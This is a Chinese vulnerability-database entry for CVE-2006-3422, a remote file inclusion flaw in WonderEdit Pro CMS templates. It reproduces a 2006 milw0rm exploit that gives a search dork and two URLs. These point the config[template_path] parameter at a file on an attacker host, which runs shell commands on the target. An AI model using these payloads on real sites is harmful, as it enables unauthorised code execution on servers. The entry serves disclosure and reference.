WonderEdit Pro 'User_Bottom.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110561 漏洞类型 输入验证
发布时间 2006-07-04 更新时间 2006-07-19
CVE编号 CVE-2006-3422 CNNVD-ID CNNVD-200607-050
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1982
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-050
|漏洞详情
WonderEditProCMS中存在PHP远程文件包含漏洞。远程攻击者可以借助包括(1)rwb(template/rwb/user_bottom.php),(2)gwb(template/rwb/user_bottom.php,(3)blues,(4)bluwhi,和(5)grns在内的多个模板使用的user_bottom.php中的config[template_path]参数,执行任意PHP代码。
|漏洞EXP
--------------------------------------------------------------------------------

Title : WonderEdit Pro CMS <= Pro version Remote File Include Vulnerabilities

###############################################################################

Discovered By OLiBekaS

-----------------------------------------------------------------------------

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Web Site CMS
version : pro version
Description: this default cms for all hosting in Wonder hosting (http://www.12wonderhosting.com/) maybe :)
URL : http://www.wonderedit.com

-----------------------------------------------------------------------------


dork        : "powered by WonderEdit Pro"

Exploit     :  

http://[target]/[path]/template/rwb/user_bottom.php?config[template_path]=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[path]/template/gwb/user_bottom.php?config[template_path]=http://[attacker]/cmd.txt?&cmd=ls              
               

------------------------------------------------------------------------------

this work for all template in WonderEdit Pro CMS and use "rwb" for or "gbw" default attack, and vulner to other tempalte to like
"blues", "bluwhi", "grns", and other.

------------------------------------------------------------------------------


greatz:
~~~~~

# Special greetz to my master effex and bEdAh`oTaK ( thank man )
# To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy. and other

-------------------------------------------------------------------------------


Contact:
~~~~~~~

Nick: OLiBekaS
E-mail: olibekas[at]gmail[dot]Com
Homepage: http://bekas.6te.net

--------------------------------- [ eof ] ---------------------------------------

# milw0rm.com [2006-07-04]
|参考资料

来源:XF
名称:wonderedit-templatepath-file-include(27536)
链接:http://xforce.iss.net/xforce/xfdb/27536
来源:BID
名称:18821
链接:http://www.securityfocus.com/bid/18821
来源:MILW0RM
名称:1982
链接:http://www.milw0rm.com/exploits/1982
来源:MILW0RM
名称:1982
链接:http://milw0rm.com/exploits/1982